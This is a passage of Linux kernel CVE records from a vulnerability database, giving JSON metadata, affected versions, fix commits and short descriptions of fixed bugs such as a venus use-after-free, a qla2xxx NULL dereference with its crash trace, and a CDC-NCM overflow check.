"lessThan": "6b04456e248761cf68f562f2fd7c04e591fcac94",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/vdpa/ifcvf/ifcvf_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.13",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nvdpa: ifcvf: Do proper cleanup if IFCVF init fails\n\nifcvf_mgmt_dev leaks memory if it is not freed before\nreturning. Call is made to correct return statement\nso memory does not leak. ifcvf_init_hw does not take\ncare of this so it is needed to do it here."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:21:26.423Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5d2cc32c1c10bd889125d2adc16a6bc3338dcd3e"
},
{
"url": "https://git.kernel.org/stable/c/6b04456e248761cf68f562f2fd7c04e591fcac94"
}
],
"title": "vdpa: ifcvf: Do proper cleanup if IFCVF init fails",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48706",
"datePublished": "2024-05-21T15:22:48.087Z",
"dateReserved": "2024-05-03T14:55:07.146Z",
"dateUpdated": "2025-05-04T08:21:26.423Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42313 (GCVE-0-2024-42313)
Vulnerability from cvelistv5
Published
2024-08-17 09:09
Modified
2025-05-04 09:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: venus: fix use after free in vdec_close
There appears to be a possible use after free with vdec_close().
The firmware will add buffer release work to the work queue through
HFI callbacks as a normal part of decoding. Randomly closing the
decoder device from userspace during normal decoding can incur
a read after free for inst.
Fix it by cancelling the work in vdec_close.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: af2c3834c8ca7cc65d15592ac671933df8848115 Version: af2c3834c8ca7cc65d15592ac671933df8848115 Version: af2c3834c8ca7cc65d15592ac671933df8848115 Version: af2c3834c8ca7cc65d15592ac671933df8848115 Version: af2c3834c8ca7cc65d15592ac671933df8848115 Version: af2c3834c8ca7cc65d15592ac671933df8848115 Version: af2c3834c8ca7cc65d15592ac671933df8848115 Version: af2c3834c8ca7cc65d15592ac671933df8848115 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42313",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:09:52.303644Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:26.779Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/platform/qcom/venus/vdec.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ad8cf035baf29467158e0550c7a42b7bb43d1db6",
"status": "affected",
"version": "af2c3834c8ca7cc65d15592ac671933df8848115",
"versionType": "git"
},
{
"lessThan": "72aff311194c8ceda934f24fd6f250b8827d7567",
"status": "affected",
"version": "af2c3834c8ca7cc65d15592ac671933df8848115",
"versionType": "git"
},
{
"lessThan": "4c9d235630d35db762b85a4149bbb0be9d504c36",
"status": "affected",
"version": "af2c3834c8ca7cc65d15592ac671933df8848115",
"versionType": "git"
},
{
"lessThan": "f8e9a63b982a8345470c225679af4ba86e4a7282",
"status": "affected",
"version": "af2c3834c8ca7cc65d15592ac671933df8848115",
"versionType": "git"
},
{
"lessThan": "da55685247f409bf7f976cc66ba2104df75d8dad",
"status": "affected",
"version": "af2c3834c8ca7cc65d15592ac671933df8848115",
"versionType": "git"
},
{
"lessThan": "66fa52edd32cdbb675f0803b3c4da10ea19b6635",
"status": "affected",
"version": "af2c3834c8ca7cc65d15592ac671933df8848115",
"versionType": "git"
},
{
"lessThan": "6a96041659e834dc0b172dda4b2df512d63920c2",
"status": "affected",
"version": "af2c3834c8ca7cc65d15592ac671933df8848115",
"versionType": "git"
},
{
"lessThan": "a0157b5aa34eb43ec4c5510f9c260bbb03be937e",
"status": "affected",
"version": "af2c3834c8ca7cc65d15592ac671933df8848115",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/media/platform/qcom/venus/vdec.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.13"
},
{
"lessThan": "4.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: venus: fix use after free in vdec_close\n\nThere appears to be a possible use after free with vdec_close().\nThe firmware will add buffer release work to the work queue through\nHFI callbacks as a normal part of decoding. Randomly closing the\ndecoder device from userspace during normal decoding can incur\na read after free for inst.\n\nFix it by cancelling the work in vdec_close."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:26:33.162Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ad8cf035baf29467158e0550c7a42b7bb43d1db6"
},
{
"url": "https://git.kernel.org/stable/c/72aff311194c8ceda934f24fd6f250b8827d7567"
},
{
"url": "https://git.kernel.org/stable/c/4c9d235630d35db762b85a4149bbb0be9d504c36"
},
{
"url": "https://git.kernel.org/stable/c/f8e9a63b982a8345470c225679af4ba86e4a7282"
},
{
"url": "https://git.kernel.org/stable/c/da55685247f409bf7f976cc66ba2104df75d8dad"
},
{
"url": "https://git.kernel.org/stable/c/66fa52edd32cdbb675f0803b3c4da10ea19b6635"
},
{
"url": "https://git.kernel.org/stable/c/6a96041659e834dc0b172dda4b2df512d63920c2"
},
{
"url": "https://git.kernel.org/stable/c/a0157b5aa34eb43ec4c5510f9c260bbb03be937e"
}
],
"title": "media: venus: fix use after free in vdec_close",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42313",
"datePublished": "2024-08-17T09:09:17.334Z",
"dateReserved": "2024-07-30T07:40:12.277Z",
"dateUpdated": "2025-05-04T09:26:33.162Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42289 (GCVE-0-2024-42289)
Vulnerability from cvelistv5
Published
2024-08-17 09:08
Modified
2025-05-04 09:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: During vport delete send async logout explicitly
During vport delete, it is observed that during unload we hit a crash
because of stale entries in outstanding command array. For all these stale
I/O entries, eh_abort was issued and aborted (fast_fail_io = 2009h) but
I/Os could not complete while vport delete is in process of deleting.
BUG: kernel NULL pointer dereference, address: 000000000000001c
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 0 P4D 0
Oops: 0000 [#1] PREEMPT SMP NOPTI
Workqueue: qla2xxx_wq qla_do_work [qla2xxx]
RIP: 0010:dma_direct_unmap_sg+0x51/0x1e0
RSP: 0018:ffffa1e1e150fc68 EFLAGS: 00010046
RAX: 0000000000000000 RBX: 0000000000000021 RCX: 0000000000000001
RDX: 0000000000000021 RSI: 0000000000000000 RDI: ffff8ce208a7a0d0
RBP: ffff8ce208a7a0d0 R08: 0000000000000000 R09: ffff8ce378aac9c8
R10: ffff8ce378aac8a0 R11: ffffa1e1e150f9d8 R12: 0000000000000000
R13: 0000000000000000 R14: ffff8ce378aac9c8 R15: 0000000000000000
FS: 0000000000000000(0000) GS:ffff8d217f000000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 000000000000001c CR3: 0000002089acc000 CR4: 0000000000350ee0
Call Trace:
<TASK>
qla2xxx_qpair_sp_free_dma+0x417/0x4e0
? qla2xxx_qpair_sp_compl+0x10d/0x1a0
? qla2x00_status_entry+0x768/0x2830
? newidle_balance+0x2f0/0x430
? dequeue_entity+0x100/0x3c0
? qla24xx_process_response_queue+0x6a1/0x19e0
? __schedule+0x2d5/0x1140
? qla_do_work+0x47/0x60
? process_one_work+0x267/0x440
? process_one_work+0x440/0x440
? worker_thread+0x2d/0x3d0
? process_one_work+0x440/0x440
? kthread+0x156/0x180
? set_kthread_struct+0x50/0x50
? ret_from_fork+0x22/0x30
</TASK>
Send out async logout explicitly for all the ports during vport delete.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42289",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:11:10.283568Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:29.913Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/scsi/qla2xxx/qla_mid.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "086489256696eb774654a5410e86381c346356fe",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "171ac4b495f9473bc134356a00095b47e6409e52",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e5ed6a26ffdec0c91cf0b6138afbd675c00ad5fc",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b12c54e51ba83c1fbc619d35083d7872e42ecdef",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d28a2075bb530489715a3b011e1dd8765ba20313",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "87c25fcb95aafabb6a4914239f4ab41b07a4f9b7",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b35d6d5a2f38605cddea7d5c64cded894fbe8ede",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "76f480d7c717368f29a3870f7d64471ce0ff8fb2",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/scsi/qla2xxx/qla_mid.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: During vport delete send async logout explicitly\n\nDuring vport delete, it is observed that during unload we hit a crash\nbecause of stale entries in outstanding command array. For all these stale\nI/O entries, eh_abort was issued and aborted (fast_fail_io = 2009h) but\nI/Os could not complete while vport delete is in process of deleting.\n\n BUG: kernel NULL pointer dereference, address: 000000000000001c\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 0 P4D 0\n Oops: 0000 [#1] PREEMPT SMP NOPTI\n Workqueue: qla2xxx_wq qla_do_work [qla2xxx]\n RIP: 0010:dma_direct_unmap_sg+0x51/0x1e0\n RSP: 0018:ffffa1e1e150fc68 EFLAGS: 00010046\n RAX: 0000000000000000 RBX: 0000000000000021 RCX: 0000000000000001\n RDX: 0000000000000021 RSI: 0000000000000000 RDI: ffff8ce208a7a0d0\n RBP: ffff8ce208a7a0d0 R08: 0000000000000000 R09: ffff8ce378aac9c8\n R10: ffff8ce378aac8a0 R11: ffffa1e1e150f9d8 R12: 0000000000000000\n R13: 0000000000000000 R14: ffff8ce378aac9c8 R15: 0000000000000000\n FS: 0000000000000000(0000) GS:ffff8d217f000000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 000000000000001c CR3: 0000002089acc000 CR4: 0000000000350ee0\n Call Trace:\n \u003cTASK\u003e\n qla2xxx_qpair_sp_free_dma+0x417/0x4e0\n ? qla2xxx_qpair_sp_compl+0x10d/0x1a0\n ? qla2x00_status_entry+0x768/0x2830\n ? newidle_balance+0x2f0/0x430\n ? dequeue_entity+0x100/0x3c0\n ? qla24xx_process_response_queue+0x6a1/0x19e0\n ? __schedule+0x2d5/0x1140\n ? qla_do_work+0x47/0x60\n ? process_one_work+0x267/0x440\n ? process_one_work+0x440/0x440\n ? worker_thread+0x2d/0x3d0\n ? process_one_work+0x440/0x440\n ? kthread+0x156/0x180\n ? set_kthread_struct+0x50/0x50\n ? ret_from_fork+0x22/0x30\n \u003c/TASK\u003e\n\nSend out async logout explicitly for all the ports during vport delete."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:26:03.484Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/086489256696eb774654a5410e86381c346356fe"
},
{
"url": "https://git.kernel.org/stable/c/171ac4b495f9473bc134356a00095b47e6409e52"
},
{
"url": "https://git.kernel.org/stable/c/e5ed6a26ffdec0c91cf0b6138afbd675c00ad5fc"
},
{
"url": "https://git.kernel.org/stable/c/b12c54e51ba83c1fbc619d35083d7872e42ecdef"
},
{
"url": "https://git.kernel.org/stable/c/d28a2075bb530489715a3b011e1dd8765ba20313"
},
{
"url": "https://git.kernel.org/stable/c/87c25fcb95aafabb6a4914239f4ab41b07a4f9b7"
},
{
"url": "https://git.kernel.org/stable/c/b35d6d5a2f38605cddea7d5c64cded894fbe8ede"
},
{
"url": "https://git.kernel.org/stable/c/76f480d7c717368f29a3870f7d64471ce0ff8fb2"
}
],
"title": "scsi: qla2xxx: During vport delete send async logout explicitly",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42289",
"datePublished": "2024-08-17T09:08:59.113Z",
"dateReserved": "2024-07-30T07:40:12.267Z",
"dateUpdated": "2025-05-04T09:26:03.484Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48938 (GCVE-0-2022-48938)
Vulnerability from cvelistv5
Published
2024-08-22 03:31
Modified
2025-05-04 08:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
CDC-NCM: avoid overflow in sanity checking
A broken device may give an extreme offset like 0xFFF0
and a reasonable length for a fragment. In the sanity
check as formulated now, this will create an integer
overflow, defeating the sanity check. Both offset
and offset + len need to be checked in such a manner
that no overflow can occur.
And those quantities should be unsigned.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48938",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:32:27.711835Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:59.501Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/usb/cdc_ncm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a612395c7631918e0e10ea48b9ce5ab4340f26a6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9957fbf34f52a4d8945d1bf39aae400ef9a11246",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "69560efa001397ebb8dc1c3e6a3ce00302bb9f7f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "49909c9f8458cacb5b241106cba65aba5a6d8f4c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7b737e47b87589031f0d4657f6d7b0b770474925",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8d2b1a1ec9f559d30b724877da4ce592edc41fdc",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/usb/cdc_ncm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.323",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.285",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.323",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.285",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.103",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nCDC-NCM: avoid overflow in sanity checking\n\nA broken device may give an extreme offset like 0xFFF0\nand a reasonable length for a fragment. In the sanity\ncheck as formulated now, this will create an integer\noverflow, defeating the sanity check. Both offset\nand offset + len need to be checked in such a manner\nthat no overflow can occur.\nAnd those quantities should be unsigned."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:26:31.772Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a612395c7631918e0e10ea48b9ce5ab4340f26a6"
},
{
"url": "https://git.kernel.org/stable/c/9957fbf34f52a4d8945d1bf39aae400ef9a11246"
},
{
"url": "https://git.kernel.org/stable/c/69560efa001397ebb8dc1c3e6a3ce00302bb9f7f"
},
{
"url": "https://git.kernel.org/stable/c/49909c9f8458cacb5b241106cba65aba5a6d8f4c"
},
{
"url": "https://git.kernel.org/stable/c/7b737e47b87589031f0d4657f6d7b0b770474925"
},
{
"url": "https://git.kernel.org/stable/c/8d2b1a1ec9f559d30b724877da4ce592edc41fdc"
}
],
"title": "CDC-NCM: avoid overflow in sanity checking",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48938",
"datePublished": "2024-08-22T03:31:33.381Z",
"dateReserved": "2024-08-22T01:27:53.623Z",
"dateUpdated": "2025-05-04T08:26:31.772Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48882 (GCVE-0-2022-48882)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/mlx5e: Fix macsec possible null dereference when updating MAC security entity (SecY)
Upon updating MAC security entity (SecY) in hw offload path, the macsec
security association (SA) initialization routine is called. In case of
extended packet number (epn) is enabled the salt and ssci attributes are
retrieved using the MACsec driver rx_sa context which is unavailable when
updating a SecY property such as encoding-sa hence the null dereference.
Fix by using the provided SA to set those attributes.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48882",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:04:52.593667Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:52.633Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
